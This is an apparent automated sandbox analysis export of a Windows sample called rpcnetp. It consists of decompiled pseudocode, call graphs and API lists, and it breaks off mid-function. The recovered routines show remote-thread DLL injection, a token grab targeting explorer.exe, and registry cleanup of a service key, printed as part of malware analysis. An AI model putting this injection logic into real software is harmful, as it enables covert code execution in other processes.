Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Message$ClassCreateDispatchFileModuleNameRegisterTimerTranslateWindow
  • String ID:
  • API String ID: 2359640614-0
  • Opcode ID: 4fe2786f5314d3c2338f25eb3034e1d77bd71f948d143fbd939a69328f7c6ae2
  • Instruction ID: f0d20772072e72a8d143b65bed25b2e852bdf8aa4a98dfbb187828f7c5d83dc6
  • Opcode Fuzzy Hash: 4fe2786f5314d3c2338f25eb3034e1d77bd71f948d143fbd939a69328f7c6ae2
  • Instruction Fuzzy Hash: 2C113DB5940204BFD710DFB5DD49DEABBBDFB99741B10C629B602D21A0D6748A458B20
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 146 a12296-a122b9 RegOpenKeyA 147 a12312-a12313 146->147 148 a122bb-a122de RegQueryValueExA 146->148 149 a122ed-a12304 RegEnumValueA 148->149 150 a122e0-a122e7 RegDeleteValueA 149->150 151 a12306-a12311 RegCloseKey 149->151 150->149 151->147
C-Code - Quality: 100%
			E00A12296() {
				int _v8;
				void* _v12;
				char _v44;
				long _t13;
				int _t23;

				_v8 = 0x80;
				_t13 = RegOpenKeyA(0x80000002, "System\\CurrentControlSet\\Services\\rpcnetp",  &_v12); // executed
				if(_t13 == 0) {
					RegQueryValueExA(_v12, 0, 0, 0, 0xa160c8,  &_v8);
					_t23 = 0x20;
					while(1) {
						_v8 = _t23;
						if(RegEnumValueA(_v12, 0,  &_v44,  &_v8, 0, 0, 0, 0) != 0) {
							break;
						}
						RegDeleteValueA(_v12,  &_v44);
					}
					return RegCloseKey(_v12);
				}
				return _t13;
			}








0x00a122aa
0x00a122b1
0x00a122b9
0x00a122cf
0x00a122dd
0x00a122ed
0x00a122fd
0x00a12304
0x00000000
0x00000000
0x00a122e7
0x00a122e7
0x00000000
0x00a12311
0x00a12313

APIs
  • RegOpenKeyA.ADVAPI32(80000002,System\CurrentControlSet\Services\rpcnetp,?), ref: 00A122B1
  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00A160C8,00000080,00000002,00000000,00000001), ref: 00A122CF
  • RegDeleteValueA.ADVAPI32(?,?), ref: 00A122E7
  • RegEnumValueA.ADVAPI32 ref: 00A12300
  • RegCloseKey.ADVAPI32(?), ref: 00A12309
Strings
  • System\CurrentControlSet\Services\rpcnetp, xrefs: 00A122A0
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Value$CloseDeleteEnumOpenQuery
  • String ID: System\CurrentControlSet\Services\rpcnetp
  • API String ID: 1768883651-3077676073
  • Opcode ID: 3b89d886fdf6e6dc95bc26592623a7d622ee9a4ce3291173ffdd8d7b5f4b6d23
  • Instruction ID: cb40558d475af733679fd2657673d1c12212c91af12c3506530cf0eb41d4cfd3
  • Opcode Fuzzy Hash: 3b89d886fdf6e6dc95bc26592623a7d622ee9a4ce3291173ffdd8d7b5f4b6d23
  • Instruction Fuzzy Hash: D601E576901118BADB209BD1DD48EDFBF7CEF092A0F104061FA05A2010D6309A96EBA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 152 a124bc-a124ec CreateRemoteThread 153 a1252b-a1252f TerminateProcess 152->153 154 a124ee-a124f1 152->154 155 a12535-a12539 153->155 156 a124f3-a124f9 154->156 157 a124fb-a12504 154->157 158 a12520-a12529 CloseHandle 156->158 159 a12506-a12508 157->159 160 a1250a 157->160 158->155 161 a1250c-a12514 WaitForMultipleObjects 159->161 160->161 161->158 162 a12516-a1251a GetExitCodeThread 161->162 162->158
C-Code - Quality: 38%
			E00A124BC(void* __ecx, void* _a4, _Unknown_base(*)()* _a8, void* _a12, intOrPtr _a16, DWORD* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				int _v12;
				void* _t14;
				int _t15;
				DWORD* _t20;
				intOrPtr _t24;

				_t20 = _a20;
				_t24 = _a16;
				_v12 = 0;
				_v8 = _t24;
				 *_t20 = 0; // executed
				_t14 = CreateRemoteThread(_a4, 0, 0, _a8, _a12, 0, 0); // executed
				_v12 = _t14;
				if(_t14 == 0) {
					_t15 = TerminateProcess(_a4, 0);
				} else {
					if(_a24 != 0) {
						_push(0xffffffff);
						_push(0);
						_push( &_v12);
						if(_t24 == 0) {
							_push(1);
						} else {
							_push(2);
						}
						if(WaitForMultipleObjects() == 0) {
							GetExitCodeThread(_v12, _t20);
						}
					} else {
						 *_t20 = 1;
					}
					_t15 = CloseHandle(_v12);
				}
				return _t15;
			}









0x00a124c2
0x00a124c7
0x00a124d1
0x00a124d7
0x00a124df
0x00a124e1
0x00a124e7
0x00a124ec
0x00a1252f
0x00a124ee
0x00a124f1
0x00a124fb
0x00a12500
0x00a12501
0x00a12504
0x00a1250a
0x00a12506
0x00a12506
0x00a12506
0x00a12514
0x00a1251a
0x00a1251a
0x00a124f3
0x00a124f3
0x00a124f3
0x00a12523
0x00a12523
0x00a12539

APIs
  • CreateRemoteThread.KERNELBASE(?,00000000,00000000,?,?,00000000,00000000), ref: 00A124E1
  • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 00A1250C
  • GetExitCodeThread.KERNEL32(?,?), ref: 00A1251A
  • CloseHandle.KERNEL32(?), ref: 00A12523
  • TerminateProcess.KERNEL32(?,00000000), ref: 00A1252F
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Thread$CloseCodeCreateExitHandleMultipleObjectsProcessRemoteTerminateWait
  • String ID:
  • API String ID: 1317926807-0
  • Opcode ID: 078464f8f8a900559fe985d9e8852544c7dfc15ebc7327f30387866cb995fcc9
  • Instruction ID: a15e153925d0881e0cf38ab8bfa4885006603b907bf27c4a446f7c289a76373f
  • Opcode Fuzzy Hash: 078464f8f8a900559fe985d9e8852544c7dfc15ebc7327f30387866cb995fcc9
  • Instruction Fuzzy Hash: 4F113975801128FFCB229F82DC88ECF7F7AEF097A1F104101F60596150D3309AA1DBA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 169 a13420-a13438 170 a1345b-a1347e 169->170 171 a1343a-a13457 call a12842 LoadLibraryA 169->171 172 a13480-a13489 GetCurrentProcessId 170->172 173 a1348b-a134a3 170->173 171->170 176 a13459 171->176 172->173 176->170
C-Code - Quality: 100%
			E00A13420(intOrPtr _a4) {
				char _v264;
				struct HINSTANCE__* _t21;
				void* _t23;
				struct HINSTANCE__* _t25;
				intOrPtr _t26;

				_t23 = 1;
				_t25 =  *0xa160c4;
				if(_a4 == 0) {
					E00A12842( &_v264, 0); // executed
					_t21 = LoadLibraryA( &_v264); // executed
					if(_t21 != 0) {
						_t25 = _t21;
					}
				}
				_t4 = _t25 -  *0xa160c4 + 0xa17204; // 0x1140
				_t26 = _t4;
				 *0xa16008 = _t26;
				 *0xa160b4 = _t25 -  *0xa160c4 + 0xa17000;
				if( *((intOrPtr*)(_t26 + 0x24)) == 0) {
					 *((intOrPtr*)(_t26 + 0x24)) = GetCurrentProcessId();
					_t23 = 0;
				}
				 *(_t26 + 0x2c +  *(_t26 + 0x28) * 4) =  *0xa160c4;
				 *0xa16000 = _t26;
				return _t23;
			}








0x00a1342c
0x00a13432
0x00a13438
0x00a13443
0x00a1344f
0x00a13457
0x00a13459
0x00a13459
0x00a13457
0x00a13463
0x00a13463
0x00a1346f
0x00a13475
0x00a1347e
0x00a13486
0x00a13489
0x00a13489
0x00a13494
0x00a13498
0x00a134a3

APIs
  • GetCurrentProcessId.KERNEL32(?,00000000), ref: 00A13480
    • Part of subcall function 00A12842: GetModuleFileNameA.KERNEL32(?,00000104), ref: 00A1285D
    • Part of subcall function 00A12842: lstrcpyA.KERNEL32(?,?), ref: 00A12893
    • Part of subcall function 00A12842: lstrlenA.KERNEL32(?), ref: 00A12896
    • Part of subcall function 00A12842: lstrcmpiA.KERNEL32(-00000003,00A112DC), ref: 00A128A4
    • Part of subcall function 00A12842: lstrcpyA.KERNEL32(-00000003,00A112DC), ref: 00A128B6
    • Part of subcall function 00A12842: CopyFileA.KERNEL32 ref: 00A128C3
    • Part of subcall function 00A12842: CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00A128DA
    • Part of subcall function 00A12842: SetFilePointer.KERNELBASE(00000000,?,00000000,00000000), ref: 00A1291F
    • Part of subcall function 00A12842: WriteFile.KERNELBASE(00000000,00000000,00000002,?,00000000), ref: 00A12931
    • Part of subcall function 00A12842: CloseHandle.KERNEL32(00000000), ref: 00A12938
  • LoadLibraryA.KERNELBASE(?,?,00000000), ref: 00A1344F
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: File$lstrcpy$CloseCopyCreateCurrentHandleLibraryLoadModuleNamePointerProcessWritelstrcmpilstrlen
  • String ID:
  • API String ID: 2826298108-0
  • Opcode ID: ef5255370b548b0b57f14f32fd64dd85854cda71516374d9e7d00c6159a8c283
  • Instruction ID: b730dae998864ed558d88f2e9eca0f9613f8fa73e319efb8bf1147ecd3489de8
  • Opcode Fuzzy Hash: ef5255370b548b0b57f14f32fd64dd85854cda71516374d9e7d00c6159a8c283
  • Instruction Fuzzy Hash: 880121799012148FDB10DFB4DE847D577E8B70C355F02C5A9E64AD3254D370A986CF54
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 177 a12266-a12293 SetServiceStatus
C-Code - Quality: 100%
			E00A12266(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				int _t7;

				 *0xa16014 = _a4;
				 *0xa16024 = _a12;
				 *0xa16028 = _a8; // executed
				_t7 = SetServiceStatus( *0xa160bc, 0xa16010); // executed
				return _t7;
			}




0x00a1226c
0x00a1227f
0x00a12287
0x00a1228c
0x00a12293

APIs
  • SetServiceStatus.ADVAPI32(00A16010,?,00A126C0,00000002,00001388,00000000), ref: 00A1228C
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: ServiceStatus
  • String ID:
  • API String ID: 3969395364-0
  • Opcode ID: 6a1881f6f530f1c0d9da72d475f272331fe7c9d000439d551459df35f8cdf818
  • Instruction ID: 6886a58150bebcee19f4a7e57ddd0b6df9968df05e75662aabde50dab6faa405
  • Opcode Fuzzy Hash: 6a1881f6f530f1c0d9da72d475f272331fe7c9d000439d551459df35f8cdf818
  • Instruction Fuzzy Hash: F8D06775901308DF8710CF98E9449C57BE8FB0C710701C41AF908C3320D671E656DB55
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 222 72b22123-72b2214e call 72b24a94 LoadLibraryA 225 72b22223-72b22227 222->225 226 72b22154-72b22167 GetProcAddress 222->226 228 72b22232-72b22236 225->228 229 72b22229-72b2222c FreeLibrary 225->229 226->225 227 72b2216d-72b2217a GetProcAddress 226->227 227->225 230 72b22180 227->230 231 72b22241-72b22249 call 72b2159c 228->231 232 72b22238-72b2223b LocalFree 228->232 229->228 233 72b22185-72b22193 LocalAlloc 230->233 232->231 233->225 235 72b22199-72b221a6 233->235 238 72b221a8-72b221b7 LocalFree 235->238 239 72b221b9-72b221bb 235->239 240 72b221bd-72b221bf 238->240 239->225 239->240 240->233 241 72b221c1-72b221c6 240->241 242 72b221c9-72b221ce 241->242 243 72b221d0-72b221dd 242->243 244 72b2220d-72b2220f 242->244 243->244 248 72b221df-72b221f2 OpenProcess 243->248 245 72b22211-72b22216 244->245 246 72b2221f 244->246 245->242 245->246 246->225 248->246 249 72b221f4-72b2220b OpenProcessToken CloseHandle 248->249 249->246
C-Code - Quality: 92%
			E72B22123(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t34;
				void* _t35;
				intOrPtr _t37;
				struct HINSTANCE__* _t45;
				void* _t46;
				void* _t49;
				long _t51;
				void* _t56;
				void* _t57;
				void* _t58;

				_t49 = __edx;
				_push(0x20);
				_push(0x72b253b8);
				E72B24A94(__ebx, __edi, __esi);
				 *(_t58 - 0x1c) =  *(_t58 - 0x1c) & 0x00000000;
				_t51 = 0x10000;
				 *(_t58 - 0x24) =  *(_t58 - 0x24) & 0x00000000;
				_t45 = LoadLibraryA("ntdll.dll");
				 *(_t58 - 0x20) = _t45;
				if(_t45 == 0) {
					L17:
					if( *(_t58 - 0x20) != 0) {
						FreeLibrary( *(_t58 - 0x20));
					}
					if( *(_t58 - 0x1c) != 0) {
						LocalFree( *(_t58 - 0x1c));
					}
					return E72B2159C( *(_t58 - 0x24), _t49);
				}
				_t33 = GetProcAddress(_t45, "NtQuerySystemInformation");
				 *(_t58 - 0x28) = _t33;
				if(_t33 == 0) {
					goto L17;
				}
				_t34 = GetProcAddress(_t45, "_wcsicmp");
				 *(_t58 - 0x2c) = _t34;
				if(_t34 == 0) {
					goto L17;
				}
				while(1) {
					_t35 = LocalAlloc(0x40, _t51);
					 *(_t58 - 0x1c) = _t35;
					if(_t35 == 0) {
						goto L17;
					}
					_t46 =  *(_t58 - 0x28)(5, _t35, _t51, 0);
					if(_t46 != 0xc0000004) {
						if(_t46 < 0) {
							goto L17;
						}
						L8:
						if(_t46 == 0xc0000004) {
							continue;
						}
						_t56 =  *(_t58 - 0x1c);
						 *(_t58 - 4) = 0;
						while(1) {
							_t37 =  *((intOrPtr*)(_t56 + 0x3c));
							if(_t37 == 0) {
								goto L14;
							}
							_push(L"explorer.exe");
							_push(_t37);
							if( *(_t58 - 0x2c)() != 0) {
								goto L14;
							}
							_t57 = OpenProcess(0x410, 0,  *(_t56 + 0x44));
							if(_t57 != 0) {
								OpenProcessToken(_t57, 0x200ff, _t58 - 0x24);
								CloseHandle(_t57);
							}
							L16:
							 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
							goto L17;
							L14:
							if( *_t56 == 0) {
								goto L16;
							}
							_t56 = _t56 +  *_t56;
							 *(_t58 - 0x30) = _t56;
						}
					}
					LocalFree( *(_t58 - 0x1c));
					 *(_t58 - 0x1c) =  *(_t58 - 0x1c) & 0x00000000;
					_t51 = _t51 + _t51;
					goto L8;
				}
				goto L17;
			}














0x72b22123
0x72b22123
0x72b22125
0x72b2212a
0x72b2212f
0x72b22133
0x72b22138
0x72b22147
0x72b22149
0x72b2214e
0x72b22223
0x72b22227
0x72b2222c
0x72b2222c
0x72b22236
0x72b2223b
0x72b2223b
0x72b22249
0x72b22249
0x72b22160
0x72b22162
0x72b22167
0x00000000
0x00000000
0x72b22173
0x72b22175
0x72b2217a
0x00000000
0x00000000
0x72b22185
0x72b22188
0x72b2218e
0x72b22193
0x00000000
0x00000000
0x72b221a2
0x72b221a6
0x72b221bb
0x00000000
0x00000000
0x72b221bd
0x72b221bf
0x00000000
0x00000000
0x72b221c1
0x72b221c6
0x72b221c9
0x72b221c9
0x72b221ce
0x00000000
0x00000000
0x72b221d0
0x72b221d5
0x72b221dd
0x00000000
0x00000000
0x72b221ee
0x72b221f2
0x72b221fe
0x72b22205
0x72b22205
0x72b2221f
0x72b2221f
0x00000000
0x72b2220d
0x72b2220f
0x00000000
0x00000000
0x72b22211
0x72b22213
0x72b22213
0x72b221c9
0x72b221ab
0x72b221b1
0x72b221b5
0x00000000
0x72b221b5
0x00000000

APIs
  • LoadLibraryA.KERNEL32(ntdll.dll,72B253B8), ref: 72B22141
  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 72B22160
  • GetProcAddress.KERNEL32(00000000,_wcsicmp), ref: 72B22173
  • LocalAlloc.KERNEL32(00000040,00010000), ref: 72B22188
  • LocalFree.KERNEL32(00000000), ref: 72B221AB
  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 72B221E8
  • OpenProcessToken.ADVAPI32(00000000,000200FF,?), ref: 72B221FE
  • CloseHandle.KERNEL32(00000000), ref: 72B22205
  • FreeLibrary.KERNEL32(00000000), ref: 72B2222C
  • LocalFree.KERNEL32(00000000), ref: 72B2223B
Strings
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: FreeLocal$AddressLibraryOpenProcProcess$AllocCloseHandleLoadToken
  • String ID: NtQuerySystemInformation$_wcsicmp$explorer.exe$ntdll.dll
  • API String ID: 3808024924-2858649656
  • Opcode ID: 7abd6da23679d2fa9a4c0e9d733775fbe992e5d219684f4782b4c9058f1b78f4
  • Instruction ID: 2cd11ee1f3bcf27d2bb61f551ead356f26b6ede089a07f4ab670a0598fbe968c
  • Opcode Fuzzy Hash: 7abd6da23679d2fa9a4c0e9d733775fbe992e5d219684f4782b4c9058f1b78f4
  • Instruction Fuzzy Hash: C831C332D503169FDB128FA9CD48B9EB6F4EF88317F210529E65AF6146DB764840CF50
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

  • Executed
  • Not Executed
control_flow_graph 194 a12123-a1214e call a14a94 LoadLibraryA 197 a12223-a12227 194->197 198 a12154-a12167 GetProcAddress 194->198 199 a12232-a12236 197->199 200 a12229-a1222c FreeLibrary 197->200 198->197 201 a1216d-a1217a GetProcAddress 198->201 202 a12241-a12249 call a1159c 199->202 203 a12238-a1223b LocalFree 199->203 200->199 201->197 204 a12180 201->204 203->202 206 a12185-a12193 LocalAlloc 204->206 206->197 208 a12199-a121a6 206->208 210 a121b9-a121bb 208->210 211 a121a8-a121b7 LocalFree 208->211 210->197 212 a121bd-a121bf 210->212 211->212 212->206 213 a121c1-a121c6 212->213 214 a121c9-a121ce 213->214 215 a121d0-a121dd 214->215 216 a1220d-a1220f 214->216 215->216 220 a121df-a121f2 OpenProcess 215->220 217 a12211-a12216 216->217 218 a1221f 216->218 217->214 217->218 218->197 220->218 221 a121f4-a1220b OpenProcessToken CloseHandle 220->221 221->218
C-Code - Quality: 91%
			E00A12123(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t34;
				void* _t35;
				intOrPtr _t37;
				struct HINSTANCE__* _t45;
				void* _t46;
				long _t50;
				void* _t55;
				void* _t56;
				void* _t57;

				_push(0x20);
				_push(0xa153b8);
				E00A14A94(__ebx, __edi, __esi);
				 *(_t57 - 0x1c) =  *(_t57 - 0x1c) & 0x00000000;
				_t50 = 0x10000;
				 *(_t57 - 0x24) =  *(_t57 - 0x24) & 0x00000000;
				_t45 = LoadLibraryA("ntdll.dll");
				 *(_t57 - 0x20) = _t45;
				if(_t45 == 0) {
					L17:
					if( *(_t57 - 0x20) != 0) {
						FreeLibrary( *(_t57 - 0x20));
					}
					if( *(_t57 - 0x1c) != 0) {
						LocalFree( *(_t57 - 0x1c));
					}
					return E00A1159C( *(_t57 - 0x24));
				}
				_t33 = GetProcAddress(_t45, "NtQuerySystemInformation");
				 *(_t57 - 0x28) = _t33;
				if(_t33 == 0) {
					goto L17;
				}
				_t34 = GetProcAddress(_t45, "_wcsicmp");
				 *(_t57 - 0x2c) = _t34;
				if(_t34 == 0) {
					goto L17;
				}
				while(1) {
					_t35 = LocalAlloc(0x40, _t50);
					 *(_t57 - 0x1c) = _t35;
					if(_t35 == 0) {
						goto L17;
					}
					_t46 =  *(_t57 - 0x28)(5, _t35, _t50, 0);
					if(_t46 != 0xc0000004) {
						if(_t46 < 0) {
							goto L17;
						}
						L8:
						if(_t46 == 0xc0000004) {
							continue;
						}
						_t55 =  *(_t57 - 0x1c);
						 *(_t57 - 4) = 0;
						while(1) {
							_t37 =  *((intOrPtr*)(_t55 + 0x3c));
							if(_t37 == 0) {
								goto L14;
							}
							_push(L"explorer.exe");
							_push(_t37);
							if( *(_t57 - 0x2c)() != 0) {
								goto L14;
							}
							_t56 = OpenProcess(0x410, 0,  *(_t55 + 0x44));
							if(_t56 != 0) {
								OpenProcessToken(_t56, 0x200ff, _t57 - 0x24);
								CloseHandle(_t56);
							}
							L16:
							 *(_t57 - 4) =  *(_t57 - 4) | 0xffffffff;
							goto L17;
							L14:
							if( *_t55 == 0) {
								goto L16;
							}
							_t55 = _t55 +  *_t55;
							 *(_t57 - 0x30) = _t55;
						}
					}
					LocalFree( *(_t57 - 0x1c));
					 *(_t57 - 0x1c) =  *(_t57 - 0x1c) & 0x00000000;
					_t50 = _t50 + _t50;
					goto L8;
				}
				goto L17;
			}













0x00a12123
0x00a12125
0x00a1212a
0x00a1212f
0x00a12133
0x00a12138
0x00a12147
0x00a12149
0x00a1214e
0x00a12223
0x00a12227
0x00a1222c
0x00a1222c
0x00a12236
0x00a1223b
0x00a1223b
0x00a12249
0x00a12249
0x00a12160
0x00a12162
0x00a12167
0x00000000
0x00000000
0x00a12173
0x00a12175
0x00a1217a
0x00000000
0x00000000
0x00a12185
0x00a12188
0x00a1218e
0x00a12193
0x00000000
0x00000000
0x00a121a2
0x00a121a6
0x00a121bb
0x00000000
0x00000000
0x00a121bd
0x00a121bf
0x00000000
0x00000000
0x00a121c1
0x00a121c6
0x00a121c9
0x00a121c9
0x00a121ce
0x00000000
0x00000000
0x00a121d0
0x00a121d5
0x00a121dd
0x00000000
0x00000000
0x00a121ee
0x00a121f2
0x00a121fe
0x00a12205
0x00a12205
0x00a1221f
0x00a1221f
0x00000000
0x00a1220d
0x00a1220f
0x00000000
0x00000000
0x00a12211
0x00a12213
0x00a12213
0x00a121c9
0x00a121ab
0x00a121b1
0x00a121b5
0x00000000
0x00a121b5
0x00000000

APIs
  • LoadLibraryA.KERNEL32(ntdll.dll,00A153B8), ref: 00A12141
  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00A12160
  • GetProcAddress.KERNEL32(00000000,_wcsicmp), ref: 00A12173
  • LocalAlloc.KERNEL32(00000040,00010000), ref: 00A12188
  • LocalFree.KERNEL32(00000000), ref: 00A121AB
  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00A121E8
  • OpenProcessToken.ADVAPI32(00000000,000200FF,?), ref: 00A121FE
  • CloseHandle.KERNEL32(00000000), ref: 00A12205
  • FreeLibrary.KERNEL32(00000000), ref: 00A1222C
  • LocalFree.KERNEL32(00000000), ref: 00A1223B
Strings
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: FreeLocal$AddressLibraryOpenProcProcess$AllocCloseHandleLoadToken
  • String ID: NtQuerySystemInformation$_wcsicmp$explorer.exe$ntdll.dll
  • API String ID: 3808024924-2858649656
  • Opcode ID: 03db7c7b0cd1b0b1d719edaacbd2244d4539c06534855437c1ed6a73ac2d8651
  • Instruction ID: f35949a8f8dae5feebadd61eda2e6d63a78fbfc81483376e5cef68194900142f
  • Opcode Fuzzy Hash: 03db7c7b0cd1b0b1d719edaacbd2244d4539c06534855437c1ed6a73ac2d8651
  • Instruction Fuzzy Hash: CE31AB35E40316AFDB218BA4EC48BEEBAB8FF5C711F244125E611B2190DBB58DD1CB64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%
			E72B227D2(void* __ecx, void* _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				void* _t18;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a8;
				_t22 = VirtualAllocEx(_t18, 0, 0x1000, 0x1000, 4);
				if(_t22 != 0) {
					if(WriteProcessMemory(_t18, _t22, _a4, lstrlenA(_a4) + 1, 0) != 0) {
						E72B224BC(_t20, _t18, __imp__LoadLibraryA, _t22, _a12,  &_v8, 1);
					}
					VirtualFreeEx(_t18, _t22, 0x1000, 0x8000);
				}
				return _v8;
			}






0x72b227d2
0x72b227d5
0x72b227d6
0x72b227db
0x72b227f2
0x72b227f6
0x72b22812
0x72b22825
0x72b22825
0x72b22832
0x72b22832
0x72b2283f

APIs
  • VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004,00000044,00000000,00000001,?,?,72B22C40,?,?,00000000,?,00000000), ref: 72B227EC
  • lstrlenA.KERNEL32(?,00000000,?,?,72B22C40,?,?,00000000,?,00000000), ref: 72B227FD
  • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,72B22C40,?,?,00000000,?,00000000), ref: 72B2280A
  • VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000,?,?,72B22C40,?,?,00000000,?,00000000), ref: 72B22832
    • Part of subcall function 72B224BC: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000), ref: 72B224E1
    • Part of subcall function 72B224BC: CloseHandle.KERNEL32(?,?,?,?,72B22C92,?,?,00000000,00000000,00000000,00000000), ref: 72B22523
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Virtual$AllocCloseCreateFreeHandleMemoryProcessRemoteThreadWritelstrlen
  • String ID:
  • API String ID: 4087653319-0
  • Opcode ID: 39c991d06c0afe38bbd8af911b84375c92ec6c3a377ed9b082cef371d702e021
  • Instruction ID: 0632e4a538d9950daad9f33b8e47e12d35339e81be77794994d5613153f95a79
  • Opcode Fuzzy Hash: 39c991d06c0afe38bbd8af911b84375c92ec6c3a377ed9b082cef371d702e021
  • Instruction Fuzzy Hash: 16018176140384FBE7218A66CC49F9B3FBCEF89B92F215418BA0AE6182D675D900C774
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B21EDA() {

				StartServiceCtrlDispatcherA(0x72b26090);
				return  *0x72b2601c;
			}



0x72b21edf
0x72b21eea

APIs
  • StartServiceCtrlDispatcherA.ADVAPI32(72B26090,72B233A1,00000000), ref: 72B21EDF
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: CtrlDispatcherServiceStart
  • String ID:
  • API String ID: 3789849863-0
  • Opcode ID: f36af199deb20c7b046a8390761e8d1e67ab46b849b99dd81197df9eaff492b9
  • Instruction ID: 1ff4504a1fc5a67fa2b7bbbe65bc285f09ccc0412d46952d551e3b44151ad459
  • Opcode Fuzzy Hash: f36af199deb20c7b046a8390761e8d1e67ab46b849b99dd81197df9eaff492b9
  • Instruction Fuzzy Hash: C8A00275551341C75D7196558584F0677D1A748681311594CE45557206C6155441B521
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%
			E72B22ADB(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t70;
				intOrPtr _t84;
